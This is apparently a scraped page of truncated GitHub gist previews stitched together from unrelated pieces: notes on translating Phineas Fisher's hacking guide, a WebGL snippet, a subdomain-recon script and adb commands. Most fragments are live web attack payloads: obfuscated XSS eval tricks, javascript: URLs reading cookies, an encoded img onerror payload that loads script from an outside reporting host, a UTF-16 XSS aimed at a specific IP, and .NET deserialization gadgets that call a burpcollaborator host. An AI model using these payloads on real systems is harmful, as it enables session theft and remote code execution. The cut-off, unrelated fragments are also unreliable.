This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
******************************* | |
Translation notes: | |
Bulk of translation done by Google Translate (which did a remarkably good job outside of slang and computer terms!), with edits for clarity and formatting by @laudecay. I got the Spanish version from the bottom of this article, it’s in the leak: https://unicornriot.ninja/2019/massive-hack-strikes-offshore-cayman-national-bank-and-trust/ | |
The UR article also has a lot of info about the history of Phineas’s hacks and resources she’s provided to the community in the past, and Crimethinc has some interviews with her. She’s also posted video interviews (a puppet and a voice actor reading chat logs, lol) and a screencast of her hacking a police department :) | |
Sources are mostly left as in the original, except where there was an obvious directly translated english version lying around. Phineas Fisher frequently cites the original HackBack guide in Spanish. The English version is here: https://www.exploit-db.com/papers/41915. The resources and content may not be precis |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<canvas id="c" width=400 height=400></canvas> | |
<script> | |
var gl = c.getContext("webgl"); | |
var vshader = `void main(){ | |
gl_Position=vec4(0,0,0,1); | |
gl_PointSize=400.0; | |
}`; | |
var fshader = `precision lowp float; | |
uniform vec3 r; | |
void main(){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##!/bin/bash | |
#starting sublist3r | |
sublist3r -d $1 -v -o domains.txt | |
#running assetfinder | |
/bin/assetfinder --subs-only $1 | tee -a domains.txt | |
#removing duplicate entries | |
sort -u domains.txt -o domains.txt | |
#checking for alive domains | |
echo "\n\n[+] Checking for alive domains..\n" | |
cat domains.txt | /bin/httprobe | tee -a alive.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
eval('ale'+'rt(0)'); | |
Function("ale"+"rt(1)")(); | |
new Function`al\ert\`6\``; | |
setTimeout('ale'+'rt(2)'); | |
setInterval('ale'+'rt(10)'); | |
Set.constructor('ale'+'rt(13)')(); | |
Set.constructor`al\x65rt\x2814\x29```; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:alert(document.domain);void(0) | |
javascript:alert(document.cookie);void(0) | |
javascript:alert(location.href);void(0) | |
javascript:x=new Image();x.src=”Xss Platform”; | |
http://onerror=location=/javascript:console.log%28document.cookie%29/.source//a[/img][url]http://a.co[/url] | |
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML) | |
http://x"><img src='x' onerror='alert(1);var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,114,101,112,111,114,116,46,115,105,110,97,97,112,112,46,99,111,109,47,116,47,49,46,106,115);document.body.appendChild(s);'/><a href=" | |
https:google.com | |
//google%E3%80%82com | |
\/\/google.com/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:alert(document.domain);void(0) | |
javascript:alert(document.cookie);void(0) | |
javascript:alert(location.href);void(0) | |
javascript:x=new Image();x.src=”Xss Platform”; | |
http://onerror=location=/javascript:console.log%28document.cookie%29/.source//a[/img][url]http://a.co[/url] | |
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML) | |
http://x"><img src='x' onerror='alert(1);var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,114,101,112,111,114,116,46,115,105,110,97,97,112,112,46,99,111,109,47,116,47,49,46,106,115);document.body.appendChild(s);'/><a href=" | |
https:google.com | |
//google%E3%80%82com | |
\/\/google.com/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://54.67.42.179/api.php/qwq?callback=%ff%fe%3C%00s%00c%00r%00i%00p%00t%00/%00C%00r%00c%00=%00%22%00%22%00%2f%00s%00r%00c%00=%00?%00c%00a%00l%00l%00b%00a%00c%00k%00=%00a%00l%00e%00r%00t%00%3E%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
string json = @"{""ChildNode"":{""__type"":""System.Xml.XmlDocument, System.Xml, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"",""InnerXml"":""<?xml version=""1.0"" encoding=""UTF-8"" standalone=""no""?><!DOCTYPE html SYSETM ""blah"" ""http://fud7urpjb08tgcq0yft2boop4ga6yv.burpcollaborator.net""}}"; | |
string json = @"{""ChildNode"":{""__type"":""System.Xml.XmlDocument, System.Xml, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"",""InnerXml"":""<?xml version=""1.0"" encoding=""UTF-8"" standalone=""no""?><!DOCTYPE html SYSETM ""blah"" ""http://fud7urpjb08tgcq0yft2boop4ga6yv.burpcollaborator.net""}}"; | |
{"$type":"System.Configuration.Install.AssemblyInstaller, | |
System.Configuration.Install, Version=4.0.0.0, Culture=neutral, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
== Adb Server | |
adb kill-server | |
adb start-server | |
== Adb Reboot | |
adb reboot | |
adb reboot recovery | |
adb reboot-bootloader | |
== Shell |